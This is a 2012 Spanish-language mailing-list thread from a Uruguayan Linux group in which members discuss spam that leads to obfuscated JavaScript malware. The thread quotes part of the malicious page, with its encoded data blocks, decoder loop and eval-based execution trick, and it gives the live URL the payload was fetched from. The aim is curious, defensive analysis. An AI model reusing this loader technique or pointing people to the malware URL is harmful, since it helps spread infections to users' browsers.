[uylug-varios] ataques curiosos

Pedro Worcel pedro at worcel.com
Wed Oct 10 17:41:27 PDT 2012 

Hola gente!

Aprovecho este post para presentarme, soy Pedro, estoy programando ahora en
Nueva Zelanda pero me crie en Mercedes, y estudie en la UTU. Me paso mi
viejo un link de esta conversacion me parecio interesante y ahora me anote
para UYLUG. Tambien me anote un poco porque me impresiono que se vaya a
organizar un evento a nivel Latinoamericano de la OWASP en Montevideo, muy
groso.

La verdad que no entiendo como codifica el malware el javascript, pero no
hace falta saberlo porque al final el mismo lo decodifica y lo manda a un
eval.

Para poder trabajar con el lo descargue desde la linea de comandos y lo
edite con vim. Reemplace todas las ocurrencias de eval por console.log y
luego copie los contenidos de el firebug en el pastebin y lo hice mas lindo.

El codigo del malware esta aca:

http://pastie.org/5032658

Y adjunto el malware, segun yo, neutralizado. (no garantizo nada eh)

Saludos!
Pedro

---------- Mensaje reenviado ----------
De: Kenneth Irving <ken at fq.edu.uy>
Fecha: 10 de octubre de 2012 19:25
Asunto: [uylug-varios] ataques curiosos
Para: UYLUG <uylug-varios at uylug.org.uy>



Hace un tiempo que de tanto en tanto recibo spam que parece diverso (el
último era un boletín de noticias trucho de CNN), pero que termina siempre
en algo parecido. Son emails que siempre tienen algún link que te baja un
HTML que contiene en su interior 3 o 4 links que te bajan un código
Javascript, que lo único que hace es bajar algún otro archivo, este sí un
HTML que contiene el código malicioso en javascript.

Paso el link final para bajar el código malicioso de javascript:

 http://2.cmisdfoundation.com/links/persons_jobs.php

y trascribo sólo parte del código. El código comienza con esto:

------------------------- comienzo ------------------------------
---
<html><head><title></title></head><body><div
dqa="asd"></div><script>dd="div";asd=function(){a=a.replace(/[^012a-z3-9]/g,"");}</script><div
5
8="16#31193r341e*34393m1e36!3f333l3j18^193t3t3331_3k33381836$193r3t3i35(3k3l3i3e10 at 321v331e36&393i3j3k23+38393c341q%3e3l3c3c3t)1c3j353k2j#3k3
p3c351q*363l3e333k!393f3e1832^1c37193r3m_313i10361t$321e3j3k3p(3c351c311c at 341c331t3k&38393j1r39+3618361616%37193r363f)3i18311t1g#1r311s371e*3
c353e373k!381r311t31^"
44="!38253m353e^3k18123f3e_121b341c33$193t353c3j(353r321t31 at 2r123f3e12&1b342t1r31+2r123f3e12%1b342t1t35)1e3n393e28#313
e343c35*3i18331c32!193t3t3t3t^1c3n393e28_313e343c35$3i1q363l3e(333k393f3e at 18341c3319&3r3i353k3l+3i3e10363l%3e333k393f)3e18193r34#18191r3936*1
83k3p3g35!3f3610331t^1t12363l3e_333k393f3e$12"
49="42e3f34 at 353j2r382t&1r3k3i3p3r+331e3i353d%3f3m352338)393c341837#193t33313k*3338183619!3r3t3
t3t39^361833193r_3k3i3p3r34$1e34393m1e(3i353d3f3m at 352338393c&341833193t+33313k3338%1836193r3t)3t3t3t3936#1811341e34*393m193r31!1t343f333l^3d3
53e3k1e_37353k253c$353d353e3k(223p293418 at 341e34393m&2924191r39+361831"
22="!18331c3219^3t3t3t3t1c_393e393k2j$333i393g3k(1q363l3e33 at 3k393f3e18&193r3m313i+10331t3k38%393j1c311t)3e313m3937#313k3f3i1c*351t121f12!1c361c391t^311e3l3j35_3i2137353e$3k3s3s1212(1c371t311e at 3m353e343f&3i3s3s12
12+1c321t311e%3g3c313k36)3f3i3d3s3s#12121c381t*311e3g3i3f!343l333k3s^3s12121r33_1e393e393k$2f"
------------------------ [código cortado] ---------------------------

El bloque de datos codificados continúa, y el archivo termina con esto:
------------------------ [continuación] -----------------------------
 65="53i)23313j3518#191e3i353g*3c31333518
!1f2s3j1f37^1c1212191r_3h1t361b37$1b17103n39(343k381t12 at 171b3b1e3g
&3c3l37393e+2j393q351b%1712103835)3937383k1t#12171b3b1e*3g3c3l3739!3e2j393q
35^1b17121017_1r3h1b1t17$3j3k3p3c35(1t12171b39 at 1b1734393j
&3g3c313p1q+393e3c393e%351r121017)1r363f3i18#3f1t1g1r3f*1s321e3c35"></div><script>
if(020==0x10)a=document.getElementsByTagName(dd)[1];
s="";
for(i=0;;i++){
        if(window.document)r=a.getAttribute(i);
        if(r){s=s+r;}else break;
}
a=s;
asd();
s="";
for(i=0;i<a.length;i+=2){
        s+=String.fromCharCode(parseInt(a.substr(i,2),32));
}
c=s;
e=eval;
try{if(020==0x10)("321".substr+"zxc")();}catch(gdsgdsg){e(c);}
                </script></body></html>
-------------------- fin -------------------------------

Esto lo paso sólo como muestra y para no publicar el socotroco completo. Es
más práctico simplemente bajarlo desde el link original.

Es obvio que el bloque de datos codificados e decodificado en el código
javascript final, y luego de decodificarlo se ejecuta con el "e(c)".

Imagino que debe tratarse de código javascript ofuscado para explotar
alguna debilidad de algún navegador o algún cliente de email, pero mis
pobres conocimientos de javascript no me han permitido decodificar esto sin
riesgo, por lo que lo publico en esta lista, tal vez alguien con suficiente
curiosidad pueda decodificarlo y hacernos saber de qué se trata. Es
simplemente curiosidad, me resultó muy interesante el trabajo que se toman
para ocultar el código malicioso.

saludos

 Kenneth
_______________________________________________
Uylug-varios mailing list
Uylug-varios at listas.uylug.org.uy
http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy


-- 
http://is.gd/droope <http://is.gd/signature_>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://listas.uylug.org.uy/pipermail/uylug-varios-uylug.org.uy/attachments/20121011/f09cd353/attachment-0002.htm>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: susp.tar.gz
Type: application/x-gzip
Size: 12684 bytes
Desc: not available
URL: <http://listas.uylug.org.uy/pipermail/uylug-varios-uylug.org.uy/attachments/20121011/f09cd353/attachment-0002.bin>

More information about the Uylug-varios mailing list